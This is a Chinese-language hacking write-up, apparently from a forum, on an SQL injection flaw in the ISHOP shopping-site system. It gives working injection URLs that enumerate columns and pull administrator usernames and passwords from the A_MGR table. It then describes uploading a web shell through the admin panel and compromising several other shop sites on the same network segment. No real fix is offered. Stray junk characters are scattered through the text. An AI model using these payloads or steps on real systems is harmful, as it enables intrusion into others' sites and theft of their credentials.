ISHOP商场建站系统注入漏洞

admin

发现一个注入点
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389

习惯性的加’having1=1--

; d( F0 o3 P; B: whttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

( ?6 g- j) @/ B% s0

8 x9 n$ N& v( S3 k* V; G, ?7 V& U爆出Diary_A.dl_Title（这时候很激动啊）

那么继续
" f# }. ~: a  U1 G9 L& W% Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

! f; K8 x5 J3 J  c继续，一直爆下去
" B& f8 w; P7 n/ Z/ g6 G6 |( S
爆到几个字段和表段 但是没找到需要的管理用户的字段

蛋疼了 怎么办 然后去后台登陆页看源码
! m' A( [3 f2 n! ~2 l
0
: l7 P# y5 J8 Y1 ]" h# D
) a0 ?/ U$ B5 Q* M$ r( AInput name= “ADUID”
Input name= “ADPWD”
" ~5 ?' i2 G! a+ O5 Q  g5 v8 P
很幸运 找到了字段那就继续
找到之后开始爆用户
* k# u& F; Q9 Shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
& S; R  @4 N: Z/ Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
+ P& ^% X  n# _, G测试了下 这个注入点只能爆到文章哪里的表
# w* ~& f% M$ H5 U2 d, P
. ^) p; f% S: ?1 e9 K+ M头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
/ u  j$ J/ e4 f+ p/ G
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
3 }  @! V' G3 @6 ^/ Q/ C# Z- I
473

: ?. C7 x1 @4 j6 L8 Q: z! h! a- P2 ?进后台

  h/ c1 Z. P! b4 T
发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马
; S+ a  X: G4 P2 \

在系统管理那里直接上传 不过没有显示地址
( M2 D% E$ }( j0 f) {
再上传一次 抓包 搞定OK

3 k0 ^/ \( C0 [2 ?
+ [$ w- `8 p/ Q
. j& T+ J9 N+ \) u1 B' L2 _472

& S/ J$ `9 z, H. Q' A6 ?( A8 p晚上不行了 去睡觉。。。
* w# |" v2 z* G7 i第二天刚起床 闲的没事做继续日站吧

, R  e! I9 Q! g  S找个站 就把这个站的旁c扫了下

, S) W# n( q  C; W发现c段也有一个购物站 ，然后还和这个站的模板差不多

就找到会员登录口测试
0 p1 P# o4 C% t: Y+ d" H6 i* t' L
. {5 V. J# W% R9 d. @9 {* V'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀

' W& _9 `1 b$ Z0 I& L再次翻c段

翻出几个站 都成功拿下
9 i, G+ V' \  X: a/ [6 i, u+ z

+ N# G( z" F" |' g  r
修复方案：
0 [& P: w4 r* U8 Y9 q0 n( P他们比我专业
5 ?1 Q* T& c# w* O2 }​
; k5 J- S# C/ C; R